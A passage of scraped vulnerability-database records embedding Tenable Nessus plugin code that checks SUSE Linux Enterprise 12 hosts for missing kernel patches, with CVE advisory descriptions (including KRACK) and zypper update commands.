value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055935\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055963\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056588\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056596\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057015\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057035\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057047\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057498\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058116\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058550\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060249\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1062279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1062520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1062962\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063102\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063501\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064436\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966316\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=981309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000252/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12153/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12154/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13080/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14051/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14106/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14489/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15265/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15649/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172847-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?353e456c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t 
patch\nSUSE-SLE-SERVER-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise High Availability 12-SP3:zypper in -t patch\nSUSE-SLE-HA-12-SP3-2017-1770=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-1770=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-base-debuginfo-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debuginfo-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-debugsource-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-default-devel-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"kernel-syms-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.92-6.18.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.92-6.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:26:51", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.90 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-10810: Memory leak in the\n virtio_gpu_object_create function in\n drivers/gpu/drm/virtio/virtgpu_object.c in the Linux\n kernel allowed attackers to cause a denial of service\n (memory consumption) by triggering object-initialization\n failures (bnc#1047277).\n\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did\n not flush the operand cache and causes a kernel stack\n dump, which allowed local users to obtain sensitive\n information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a\n crafted ACPI table (bnc#1049580).\n\n - CVE-2017-11473: Buffer overflow in the\n mp_override_legacy_irq() function in\n arch/x86/kernel/acpi/boot.c in the Linux kernel allowed\n local users to gain privileges via a crafted ACPI table\n (bnc#1049603).\n\n - CVE-2017-12134: The xen_biovec_phys_mergeable function\n in drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability calculation\n 
(bnc#1051790 bnc#1053919).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel. This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1063667).\n\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash) by leveraging root access\n (bnc#1056588).\n\n - CVE-2017-14106: The tcp_disconnect function in\n net/ipv4/tcp.c in the Linux kernel allowed local users\n to cause a denial of service (__tcp_select_window\n divide-by-zero error and system crash) by triggering a\n disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger 
mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\n - CVE-2017-7518: The Linux kernel was vulnerable to an\n incorrect debug exception(#DB) error. It could occur\n while emulating a syscall instruction and potentially\n lead to guest privilege escalation. (bsc#1045922).\n\n - CVE-2017-7541: The brcmf_cfg80211_mgmt_tx function in\n drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg8021\n 1.c in the Linux kernel allowed local users to cause a\n denial of service (buffer overflow and system crash) or\n possibly gain privileges via a crafted NL80211_CMD_FRAME\n Netlink packet (bnc#1049645).\n\n - CVE-2017-7542: The ip6_find_1stfragopt function in\n net/ipv6/output_core.c in the Linux kernel allowed local\n users to cause a denial of service (integer overflow and\n infinite loop) by leveraging the ability to open a raw\n socket (bnc#1049882).\n\n - CVE-2017-8831: The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux\n kernel allowed local users to cause a denial of service\n (out-of-bounds array access) or possibly have\n unspecified other impact by changing a certain\n sequence-number value, aka a 'double fetch'\n vulnerability (bnc#1037994).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 35, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2017-10-30T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2869-1) (KRACK)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-13080", "CVE-2017-14489", "CVE-2017-7518", "CVE-2017-15649", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-8831", "CVE-2017-10810", "CVE-2017-14106", "CVE-2017-11473", "CVE-2017-7541", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-6346", "CVE-2017-7542", "CVE-2017-12154"], "modified": "2017-10-30T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-2869-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104253", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2869-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104253);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-10810\", \"CVE-2017-11472\", \"CVE-2017-11473\", \"CVE-2017-12134\", \"CVE-2017-12153\", 
\"CVE-2017-12154\", \"CVE-2017-13080\", \"CVE-2017-14051\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15649\", \"CVE-2017-6346\", \"CVE-2017-7518\", \"CVE-2017-7541\", \"CVE-2017-7542\", \"CVE-2017-8831\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2869-1) (KRACK)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.90 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-10810: Memory leak in the\n virtio_gpu_object_create function in\n drivers/gpu/drm/virtio/virtgpu_object.c in the Linux\n kernel allowed attackers to cause a denial of service\n (memory consumption) by triggering object-initialization\n failures (bnc#1047277).\n\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did\n not flush the operand cache and causes a kernel stack\n dump, which allowed local users to obtain sensitive\n information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a\n crafted ACPI table (bnc#1049580).\n\n - CVE-2017-11473: Buffer overflow in the\n mp_override_legacy_irq() function in\n arch/x86/kernel/acpi/boot.c in the Linux kernel allowed\n local users to gain privileges via a crafted ACPI table\n (bnc#1049603).\n\n - CVE-2017-12134: The xen_biovec_phys_mergeable function\n 
in drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bnc#1053919).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel. This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1063667).\n\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash) by leveraging root access\n (bnc#1056588).\n\n - CVE-2017-14106: The tcp_disconnect function in\n net/ipv4/tcp.c in the Linux kernel allowed local users\n to cause a denial of service (__tcp_select_window\n divide-by-zero error and system crash) by triggering a\n disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux 
